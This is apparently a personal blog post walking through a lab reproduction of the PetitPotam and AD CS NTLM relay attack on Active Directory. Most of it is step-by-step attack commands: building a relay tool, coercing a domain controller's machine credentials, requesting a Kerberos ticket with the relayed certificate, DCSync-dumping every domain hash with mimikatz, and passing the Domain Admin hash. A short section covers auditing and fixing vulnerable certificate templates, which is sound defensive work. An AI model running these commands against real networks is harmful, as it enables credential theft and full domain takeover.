All links of articles and tools at the bottom of the page
There is nothing new i’ve discovered, this is just a few printscreens of what other people on Twitter were talking and I tested in my Lab to realise the gravity of this !
Since then, I already fixed a vulnerable template at a Client’s place which would have rendered this attack possible.
Just saw now, that @remiescourrou had also been writting about this.
Original article was from ExAndroidDev : https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/
The difference with his post, is that I used topotam’s discovery and tool to achieve the same attack
STEP 0: Compiling ExAndroidDev version of NtlmRelayX
PR : 1101
git clone git clone https://github.com/ExAndroidDev/impacket
git switch ntlmrelayx-adcs-attack
python3 -m pip install .
STEP 1: Prepare NtlmRelayX
Prepare Relay to PKI web service running on DC01
ntlmrelayx.py -t http://192.168.16.11/certsrv/certfnsh.asp -smb2support --adcs
STEP 2: Run PetitPotam to DC02
PetitPotam 192.168.15.24 192.168.16.12
Translation : Hey DC02 send your machine creds to my Kali ! ( Account : DC02$ )
or you can use the python version from the Kali box also.
Ntlmrelay will generate a CSR and try to abuse a vulnerable PKI template to generate a cert
(of course this only works if the AD CS template is vulnerable ! Will see later the results of the Audit report )
STEP 3: Get a Kerberos Ticket with the Cert by using Rubeus
Rubeus.exe asktgt /user:<user> /certificate:<base64-certificate> /ptt
in my case it was a cert for dc02$ as I relay the machine creds of DC02.
Ticket is now active in my Windows Machine.
You can check with the command klist
You have now an ticket with privileges which will let you DCSyncing the DC
STEP4: DCSync with Mimiktaz to get DA creds
lsadump::dcsync /domain:timatec.local /all /csv
As you can see, we had DCSync rights to be able to dump all hashes of all users in the Domain Controller
PTH to DomainAdmin
As we now have the DomainAdmin NTLM hash, we only need to do a Pass The Hash to use the Domain Admin hash.
This can be achieved by many different ways, here we are using mimikatz pth
On my Windows machine
sekurlsa::pth /user:Administrator /domain:timatec.local /ntlm:5c0c009b522xxxxxxxxxxxxxxxxxxxx
as example I connected to the C$ of the domain controller.
Additional print screens
My initial setup didn’t have a vulnerable PKI template.
So I started to add some configuration to my PKI and to check it was vulnerable, i used the defending powershell script.
Here is the outcome of this script after adding some vulnerable PKI template. We can see ESC8, ESC4 and ESC3 vulnerabilities reported
Before I got my vulnerable template i was having the following Failed requests
Working through your PKI templates with the output of the audit script, until it solved. There is no 0 day, this is working as per design, it’s just a misconfiguration on your PKI server.
Here is again the link for the Audit Script published by HarmJ0y and Lee Christensen
NtlmRelayx from SecureAuthCorp original code : https://github.com/SecureAuthCorp/impacket
NtlmRelayx PR from ExAndroidDev https://github.com/ExAndroidDev/impacket/tree/ntlmrelayx-adcs-attack7